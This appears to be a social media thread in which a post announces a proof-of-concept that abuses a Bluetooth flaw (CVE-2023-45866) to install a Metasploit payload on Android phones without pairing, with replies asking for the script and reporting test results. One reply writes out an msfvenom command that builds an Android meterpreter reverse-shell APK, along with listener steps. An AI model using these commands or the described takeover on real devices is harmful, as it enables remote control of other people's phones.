PoC to takeover Android using another Android by exploiting critical Bluetooth vulnerability to install #Metasploit payload without proper Bluetooth pairing (CVE-2023-45866) It still affects Android 10 and bellow mobile-hacker.com/2024/01/23/exp… #NetHunter

In a different 0-click exploit scenario: It is also possible to lock-out user from its smartphone by brute-forcing a lock-screen passcodes in a loop to trigger 30 seconds and then 60 seconds timeout. Injected key-presses are typed way faster then user taps to unlock the device.

@androidmalware2 Keep up the good work! Hope to see a new PoC video on macOS, iOS and Windows ;)

@androidmalware2 Is victim interaction required for accept the bluetooth connect with the attacker device?

@androidmalware2 my android version is 10 on a Xiaomi redmi note 7 phone, but when i run the default script that injects tabs for 10 seconds, it does not force pair the phone but requires me to pair it first which is not zero click, any idea why this is happening?

@androidmalware2 can we get the exploit ?

@androidmalware2 Andoird 10 and below? I think @marcnewlin said this will work from Android 4.2.2 to 14 (as long as the latest patches are not installed). I tested this on an unpatched Android 11 (Pixel 3a) and it did work.

@androidmalware2 Sir while my kernel support internal bluetooth i still have problems with bluebinder it show me Bluetooth binder service failed .. it detect hci0 but interface cant be up its always down .. 6 months ago same kernel and same rom was working fine for other people any idea or help

@androidmalware2 Flipper can do it 💪

@androidmalware2 Is there a way to access my network mobile devices to delete some files

@androidmalware2 How is the process and from where to download

@androidmalware2 Can I install net hunter on OnePlus 11R?

@androidmalware2 can you share the script to inject the metasploit payload? thanks

@androidmalware2 🔥

@androidmalware2 I will write a code Msfvenom -p Android/meterpreter/reverse_tcp Lhost=192.168.9 ip address Lport=4444Port number R >Malware.apk *Msfconsole *Meterpreter reverse_tcp *Lhost=192.168.9 Ip address Lport=4444 portnumber *Exploit

@androidmalware2 🔥 But Target device rooted ?

@androidmalware2 Tried performing on multiple devices Android 10,11,12,13 from one plus to Xiaomi , Motorola it pops up pairing notifications and if we don’t accept it, it won’t work all these device are not patched not sure how the author was able to produce it as zero click

@androidmalware2 How to detect is metasplpot was installed or not?